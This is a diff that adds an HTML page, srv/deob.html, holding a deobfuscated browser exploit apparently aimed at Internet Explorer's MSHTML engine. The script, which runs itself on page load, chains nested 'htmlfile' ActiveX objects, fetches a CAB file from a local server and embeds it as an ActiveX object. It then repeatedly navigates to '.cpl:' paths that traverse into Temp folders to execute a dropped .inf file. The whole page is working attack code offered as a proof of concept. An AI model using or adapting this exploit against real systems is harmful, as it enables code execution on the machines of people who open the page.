-

srv/deob.html

@@ -0,0 +1,81 @@
+<!DOCTYPE html>
+<html>
+ <head>
+  <meta http-equiv="Expires" content="-1">
+  <meta http-equiv="X-UA-Compatible" content="IE=11">
+ </head>
+ <body>
+<script>
+function exploit() {
+
+   var x = window["document"];
+   var then = window["Document"]["prototype"]["createElement"];
+   var _0x4d7c02 = window["Document"]["prototype"]["write"];
+   var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
+   var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
+   var range = then["call"](x, "iframe");
+   try {
+     PL$22["call"](x["body"], range);
+   } catch (errx) {
+     PL$22["call"](x["documentElement"], range);
+   }
+   var ACTIVEX = range["contentWindow"]["ActiveXObject"];
+   var view = new ACTIVEX("htmlfile");
+   range["contentDocument"]["open"]()["close"]();
+
+   try {
+     opfilter["call"](x["body"], range);
+   } catch (err) {
+     opfilter["call"](x["documentElement"], range);
+   }
+
+   view["open"]()["close"]();
+   var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
+   mappedObj["open"]()["close"]();
+   var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
+   TokenType["open"]()["close"]();
+   var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
+   model["open"]()["close"]();
+   var iedom = new ActiveXObject("htmlfile");
+   var rp_test = new ActiveXObject("htmlfile");
+   var wmp_test = new ActiveXObject("htmlfile");
+   var doc = new ActiveXObject("htmlfile");
+   var a = new ActiveXObject("htmlfile");
+   var fake = new ActiveXObject("htmlfile");
+   var errors = window["XMLHttpRequest"];
+   var $node = new errors;
+   var directiveProcessors = errors["prototype"]["open"];
+   var nodeTypeRender = errors["prototype"]["send"];
+   var newAttributes = window["setTimeout"];
+   directiveProcessors["call"]($node, "GET", "http://127.0.0.1/test.cab", ![]);
+   nodeTypeRender["call"]($node);
+
+   model["Script"]["document"]["write"]("<body>");
+   var PL$41 = then["call"](model["Script"]["document"], "object");
+   PL$41["setAttribute"]("codebase", "http://127.0.0.1/test.cab#version=5,0,0,0");
+   PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
+   PL$22["call"](model["Script"]["document"]["body"], PL$41);
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:123";
+   iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/championship.inf";
+   rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/championship.inf";
+   wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/championship.inf";
+   doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/championship.inf";
+   a["Script"]["location"] = ".cpl:../../../../../Temp/Low/championship.inf";
+   doc["Script"]["location"] = ".cpl:../../../../../Temp/championship.inf";
+   doc["Script"]["location"] = ".cpl:../../Low/championship.inf";
+   doc["Script"]["location"] = ".cpl:../../championship.inf";
+}
+
+exploit();
+
+</script>
+ </body>
+</html>